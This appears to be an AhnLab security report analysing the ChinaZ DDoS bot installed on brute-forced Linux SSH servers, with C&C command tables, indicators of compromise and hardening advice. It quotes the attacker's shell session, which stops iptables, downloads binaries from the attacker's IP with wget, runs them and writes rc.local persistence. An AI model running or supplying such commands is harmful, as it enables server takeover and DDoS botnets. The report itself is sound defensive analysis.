AhnLab Security Emergency response Center (ASEC) has recently discovered the ChinaZ DDoS Bot malware being installed on inadequately managed Linux SSH servers. As one of the Chinese threat groups that were first discovered around 2014, the ChinaZ group installs various DDoS bots on Windows and Linux systems. [1] Major DDoS bots assumed to have been created by the ChinaZ threat group include XorDDoS, AESDDos, BillGates, and MrBlack. This article will cover the DDoS bot known as ChinaZ or ChinaZ DDoSClient.
1. Attack Campaigns Against Linux SSH Servers
While desktop environments are typically used by average users, servers are designed to provide specialized services. Due to this, malware infections usually happen on desktop environments through web browsers or email attachments. Threat actors also distribute their malware disguised as normal programs to trick users into installing them. The above methods, however, have limitations when trying to target server environments, so threat actors have to use a different approach. A prime example of this would be when targeting servers that are poorly managed or are open to vulnerability attacks due to not having been patched to the most recent version.
Simple account credentials are a common form of poorly managed services as they are vulnerable to dictionary attacks. For example, Remote Desktop Protocol (RDP) and MS-SQL services are one of the main attack vectors of Windows operating systems. In Linux server environments, Secure Shell (SSH) services are a common target while the Telnet service is a target for dictionary attacks in old Linux servers or IoT environments where an embedded Linux OS has been installed.
The ChinaZ threat group’s ChinaZ DDoSClient that will be covered in this post is assumed to have been installed using account credentials obtained through the use of scanners and the SSH BruteForce malware. The threat group most likely scanned port 22, the area where SSH services operate, before finding an active SSH service and performing a dictionary attack using commonly used SSH account credentials.
User | Password | Attacker |
root | – | 45.113.163[.]219 |
After logging in, the threat group then used a command like the one below to install ChinaZ on the Linux server. Additionally, the IP address of the threat actor who logged in to the SSH server and the address used to download ChinaZ are the same.
# service iptables stop
# wget hxxp://45.113.163[.]219/linux64
# nohup /root/linux64 > /dev/null 2>&1 &
# chmod 777 linux64
# ./linux64
# chmod 0755 /root/linux64
# nohup /root/linux64 > /dev/null 2>&1 &
# chmod 0777 linux64
# chmod u+x linux64
# ./linux64 &
# chmod u+x linux64
# ./linux64 &
# cd /tmp
# service iptables stop
# wget hxxp://45.113.163[.]219/linux32
# nohup /root/linux32 > /dev/null 2>&1 &
# chmod 777 linux32
# ./164
# chmod 0755 /root/linux32
# nohup /root/linux32 > /dev/null 2>&1 &
# chmod 0777 linux32
# chmod u+x linux32
# ./linux32 &
# chmod u+x dos6cc4
# ./linux32 &
# cd /tmp
# echo “cd /root/”>>/etc/rc.local
# echo “./linux64&”>>/etc/rc.local
# echo “./linux32&”>>/etc/rc.local
# echo “/etc/init.d/iptables stop”>>/etc/rc.local
The threat actor disabled iptables (which is also the firewall), and used wget to install ChinaZ DDoSClient which has been built for x86 and x64 architectures. The threat actor logged into the root account and installed the downloaded malware into the /root directory. The later installed ChinaZ was executed and registered to rc.local to maintain persistence so that it would operate even after reboots.
2. ChinaZ DDoSClient (Linux)
A variety of information set by the creator of ChinaZ can be obtained since its debug information is included in its binary. Adding to this, it is also a type of open-source malware with a public source code.
Upon execution, ChinaZ disguises itself with the name “declient”. To achieve this, it utilizes a method that sets the argument “PR_SET_NAME” of the prctl() function as “declient”. By doing so, if the “pstree” command or any other command like “/cat/proc/[pid]/comm” are used to scan the currently running processes, the process “declient” will be seen.
The “MK64_SecurtDoor” string that can be seen in the code is the Logo string designated by the threat actor and is one of the strings that has seen continuous use since the past. [2] Additionally, this malware is for the x86 architecture. In the x64 architecture binary, the name “ceS_46KM” is used as the Logo string.
The C&C server address is encoded in ChinaZ, but it can easily be retrieved through a decryption routine using the CSocketManager::Initalize() method.
The CSocketManager::Woring() method is responsible for the actual features. The CSocketManager::GetOnlineInfo() method is first used to collect the basic information of infected systems before transmitting them to the C&C server. According to the public source code, the information that is transmitted is LOGININFO struct and it has the following structure.
Offset | Size | Description |
0x0000 | 0x0040 | OS version info (OS name, release information) |
0x0040 | 0x0020 | Version information (G2-F5) |
0x0060 | 0x0020 | CPU information (number of processors, performance) |
0x0080 | 0x0020 | RAM size |
0x00A0 | 0x0020 | Network card information |
0x00C0 | 0x0010 | DDoS attack bandwidth information |
0x00D0 | 0x0010 | CPU usage |
0x00E0 | 0x0020 | Threat actor’s Mark string. (“UST”) |
0x0100 | 0x0004 | DDoS attack flag (0: Attack in progress, 1: Attack stopped) |
0x0104 | 0x0004 | Number of DDoS attacks currently in progress |
0x0108 | 0x0080 | Status of DDoS attacks currently in progress |
The below routine covers the information collection process from infected systems. It is notable that various methods can be used to collect information, from the simple method of using functions such as uname() to using “cat” or “ethtool” commands.
The collected information is transmitted to the C&C server via the CSocketManager::SendOnlineInfo() method, after which malicious behaviors can be performed through commands sent from the C&C server.
ChinaZ can perform malicious behaviors by receiving commands from the threat actor. The following is a list of commands that can be executed.
Command Number | Command Name | Description |
0x0008 | COMMAND_RUN_CMD | Run command |
0x0009 | COMMAND_DNS_SET | Set DNS server |
0x0010 | COMMAND_DDOS_ATTACK | DDoS attack |
0x0011 | COMMAND_DDOS_STOP | Stop DDoS attack |
0x0012 | COMMAND_DDOS_SET | Set range of target IP addresses for attack |
0x0014 | TOKEN_HEARTBEAT | HeartBeat |
0x0016 | TOKEN_LOGO_CHANGE | Change Logo |
0x0017 | TOKEN_SET_CPU_LIMIT | Set CPU limit |
0x0018 | TOKEN_SET_ONLINE_ADDR | Change C&C server URL |
Most of the commands supported by the DDoS bot, ChinaZ, are characteristically DDoS attack commands. Supported DDoS attacks include SYN, UDP, ICMP, and DNS Flood attacks.
Command Number | Command Name | Description |
0x0001 | ATTACK_SYN | SYN Flood |
0x0002 | ATTACK_UDP | UDP Flood |
0x0003 | ATTACK_ICMP | ICMP Flood |
0x0004 | ATTACK_DNS | DNS Flood |
3. ChinaZ DDoSClient (Windows)
Although it was not detected in attacks targeting Linux SSH servers, ChinaZ in PE formats can be found on even VirusTotal in attacks targeting Windows systems. Since it is practically identical to the Linux version, this post will mainly focus on the differences.
ChinaZ for Windows disguises itself with the name “Declient”, much like the Linux version. To achieve this, it copies itself under the name “Declient.exe” in the %SystemRoot% directory and registers itself to the Run key so that it can operate even after reboots.
The C&C server address and the address of the second C&C server, the backdoor C&C that runs after a set period of time, are the same as the previous Linux version.
While the LOGININFO struct used to store the information collected from the infected system is identical to its Linux counterpart, there are some unused items. The string “UST” is used as the Mark string, like the Linux version.
Offset | Size | Description |
0x0000 | 0x0040 | OS version information |
0x0040 | 0x0020 | Not used |
0x0060 | 0x0020 | CPU performance information |
0x0080 | 0x0020 | Not used |
0x00A0 | 0x0020 | Not used |
0x00C0 | 0x0010 | DDoS attack bandwidth information |
0x00D0 | 0x0010 | CPU usage |
0x00E0 | 0x0020 | Threat actor’s Mark string. (“UST”) |
0x0100 | 0x0004 | DDoS attack flag (0: Attack in progress, 1: Attack stopped) |
0x0104 | 0x0004 | Number of DDoS attacks currently in progress |
0x0108 | 0x0080 | Status of DDoS attacks currently in progress |
지원하는 명령의 경우 실질적으로 동일하지만 리눅스 버전과 비교해서 수량은 적은 편이다. DDoS 공격 명령은 SYN, UDP, ICMP, DNS Flood 4가지 모두 동일하다.
Command Number | Command Name | Description |
0x0008 | COMMAND_RUN_CMD | Run command |
0x0009 | COMMAND_DNS_SET | Set DNS server |
0x0010 | COMMAND_DDOS_ATTACK | DDoS attack |
0x0011 | COMMAND_DDOS_STOP | Stop DDoS attack |
0x0014 | TOKEN_HEARTBEAT | HeartBeat |
4. Conclusion
Recently, threat actors have been installing the ChinaZ DDoS Bot malware on inadequately managed Linux SSH servers. These types of attacks have been occurring steadily for some time now, and new instances of such attacks are still being discovered. If ChinaZ DDoS Bot is installed on a Linux server, the server can be used as a DDoS bot that receives commands from the threat actor to perform DDoS attacks on specific targets. It can also install additional malware or be used in other attacks.
Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.
File Detection
– Linux/Ddos.1571389 (2015.05.14)
– Linux/Ddos.1806356 (2015.05.14)
– Trojan/Win32.Agent.R192331 (2016.12.25.08)
– c69f5eb555cc10f050375353c205d5fa : ChinaZ DDoSClient – Linux x86 (linux32)
– c9eb0815129c135db5bbb8ac79686b9a : ChinaZ DDoSClient – Linux x64 (linux64)
– 2ec7348e6b6b32d50a01c3ffe480ef70 : ChinaZ DDoSClient – Windows x86 (win32)
Download URLs
– hxxp://45.113.163[.]219/linux32
– hxxp://45.113.163[.]219/linux64
– hxxp://45.113.163[.]219/win32
– 45.113.163[.]219:29134
– www[.]911ddos[.]com:10912
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